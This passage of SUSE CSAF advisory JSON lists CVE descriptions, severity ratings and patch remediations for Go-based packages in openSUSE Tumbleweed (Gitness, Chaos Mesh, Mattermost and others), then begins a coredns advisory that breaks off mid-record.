"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58157"
},
{
"cve": "CVE-2025-58158",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58158"
}
],
"notes": [
{
"category": "general",
"text": "Harness Open Source is an end-to-end developer platform with Source Control Management, CI/CD Pipelines, Hosted Developer Environments, and Artifact Registries. Prior to version 3.3.0, Open Source Harness git LFS server (Gitness) exposes api to retrieve and upload files via git LFS. Implementation of upload git LFS file api is vulnerable to arbitrary file write. Due to improper sanitization for upload path, a malicious authenticated user who has access to Harness Gitness server api can use a crafted upload request to write arbitrary file to any location on file system, may even compromise the server. Users using git LFS are vulnerable. This issue has been patched in version 3.3.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58158",
"url": "https://www.suse.com/security/cve/CVE-2025-58158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58158"
},
{
"cve": "CVE-2025-58430",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58430"
}
],
"notes": [
{
"category": "general",
"text": "listmonk is a standalone, self-hosted, newsletter and mailing list manager. In versions up to and including 1.1.0, every http request in addition to the session cookie `session` there included `nonce`. The value is not checked and validated by the backend, removing `nonce` allows the requests to be processed correctly. This may seem harmless, but if chained to other vulnerabilities it can become a critical vulnerability. Cross-site request forgery and cross-site scripting chained together can result in improper admin account creation. As of time of publication, no patched versions are available.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58430",
"url": "https://www.suse.com/security/cve/CVE-2025-58430"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-58430"
},
{
"cve": "CVE-2025-58437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58437"
}
],
"notes": [
{
"category": "general",
"text": "Coder allows organizations to provision remote development environments via Terraform. In versions 2.22.0 through 2.24.3, 2.25.0 and 2.25.1, Coder can be compromised through insecure session handling in prebuilt workspaces. Coder automatically generates a session token for a user when a workspace is started. It is automatically exposed via coder_workspace_owner.session_token. Prebuilt workspaces are initially owned by a built-in prebuilds system user. When a prebuilt workspace is claimed, a new session token is generated for the user that claimed the workspace, but the previous session token for the prebuilds user was not expired. Any Coder workspace templates that persist this automatically generated session token are potentially impacted. This is fixed in versions 2.24.4 and 2.25.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58437",
"url": "https://www.suse.com/security/cve/CVE-2025-58437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58437"
},
{
"cve": "CVE-2025-58445",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58445"
}
],
"notes": [
{
"category": "general",
"text": "Atlantis is a self-hosted golang application that listens for Terraform pull request events via webhooks. All versions of Atlantis publicly expose detailed version information through its /status endpoint. This information disclosure could allow attackers to identify and target known vulnerabilities associated with the specific versions, potentially compromising the service\u0027s security posture. This issue does not currently have a fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58445",
"url": "https://www.suse.com/security/cve/CVE-2025-58445"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58445"
},
{
"cve": "CVE-2025-58450",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58450"
}
],
"notes": [
{
"category": "general",
"text": "pREST (PostgreSQL REST), is an API that delivers an application on top of a Postgres database. SQL injection is possible in versions prior to 2.0.0-rc3. The validation present in versions prior to 2.0.0-rc3 does not provide adequate protection from injection attempts. Version 2.0.0-rc3 contains a patch to mitigate such attempts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58450",
"url": "https://www.suse.com/security/cve/CVE-2025-58450"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-58450"
},
{
"cve": "CVE-2025-59358",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59358"
}
],
"notes": [
{
"category": "general",
"text": "The Chaos Controller Manager in Chaos Mesh exposes a GraphQL debugging server without authentication to the entire Kubernetes cluster, which provides an API to kill arbitrary processes in any Kubernetes pod, leading to cluster-wide denial of service.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59358",
"url": "https://www.suse.com/security/cve/CVE-2025-59358"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59358"
},
{
"cve": "CVE-2025-59359",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59359"
}
],
"notes": [
{
"category": "general",
"text": "The cleanTcs mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59359",
"url": "https://www.suse.com/security/cve/CVE-2025-59359"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59359"
},
{
"cve": "CVE-2025-59360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59360"
}
],
"notes": [
{
"category": "general",
"text": "The killProcesses mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59360",
"url": "https://www.suse.com/security/cve/CVE-2025-59360"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59360"
},
{
"cve": "CVE-2025-59361",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59361"
}
],
"notes": [
{
"category": "general",
"text": "The cleanIptables mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59361",
"url": "https://www.suse.com/security/cve/CVE-2025-59361"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59361"
},
{
"cve": "CVE-2025-7445",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-7445"
}
],
"notes": [
{
"category": "general",
"text": "Kubernetes secrets-store-sync-controller in versions before 0.0.2 discloses service account tokens in logs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-7445",
"url": "https://www.suse.com/security/cve/CVE-2025-7445"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-7445"
},
{
"cve": "CVE-2025-8396",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-8396"
}
],
"notes": [
{
"category": "general",
"text": "Insufficiently specific bounds checking on authorization header could lead to denial of service in the Temporal server on all platforms due to excessive memory allocation.This issue affects all platforms and versions of OSS Server prior to 1.26.3, 1.27.3, and 1.28.1 (i.e., fixed in 1.26.3, 1.27.3, and 1.28.1 and later). Temporal Cloud services are not impacted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-8396",
"url": "https://www.suse.com/security/cve/CVE-2025-8396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-8396"
},
{
"cve": "CVE-2025-9072",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9072"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.10.x \u003c= 10.10.1, 10.5.x \u003c= 10.5.9, 10.9.x \u003c= 10.9.4 fail to validate the redirect_to parameter, allowing an attacker to craft a malicious link that, once a user authenticates with their SAML provider, could post the user\u0027s cookies to an attacker-controlled URL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9072",
"url": "https://www.suse.com/security/cve/CVE-2025-9072"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-9072"
},
{
"cve": "CVE-2025-9076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9076"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.10.x \u003c= 10.10.1 fail to properly sanitize user data during shared channel membership synchronization, which allows malicious or compromised remote clusters to access sensitive user information via unsanitized user objects. This vulnerability affects Mattermost Server instances with shared channels enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9076",
"url": "https://www.suse.com/security/cve/CVE-2025-9076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9076"
},
{
"cve": "CVE-2025-9078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9078"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.8.x \u003c= 10.8.3, 10.5.x \u003c= 10.5.8, 9.11.x \u003c= 9.11.17, 10.10.x \u003c= 10.10.1, 10.9.x \u003c= 10.9.3 fail to properly validate cache keys for link metadata which allows authenticated users to access unauthorized posts and poison link previews via hash collision attacks on FNV-1 hashing",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9078",
"url": "https://www.suse.com/security/cve/CVE-2025-9078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9078"
},
{
"cve": "CVE-2025-9084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9084"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.5.x \u003c= 10.5.9 fail to properly validate redirect URLs which allows attackers to redirect users to malicious sites via crafted OAuth login URLs",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9084",
"url": "https://www.suse.com/security/cve/CVE-2025-9084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9084"
}
]
}
opensuse-su-2025:15561-1
Vulnerability from csaf_opensuse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "coredns-1.12.4-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the coredns-1.12.4-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15561",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15561-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58063 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58063/"
}
],
"title": "coredns-1.12.4-2.1 on GA media",
"tracking": {
"current_release_date": "2025-09-18T00:00:00Z",
"generator": {
"date": "2025-09-18T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15561-1",
"initial_release_date": "2025-09-18T00:00:00Z",
"revision_history": [
{
"date": "2025-09-18T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.aarch64",
"product": {
"name": "coredns-1.12.4-2.1.aarch64",
"product_id": "coredns-1.12.4-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.aarch64",
"product": {
"name": "coredns-extras-1.12.4-2.1.aarch64",
"product_id": "coredns-extras-1.12.4-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.ppc64le",
"product": {
"name": "coredns-1.12.4-2.1.ppc64le",
"product_id": "coredns-1.12.4-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.ppc64le",
"product": {
"name": "coredns-extras-1.12.4-2.1.ppc64le",
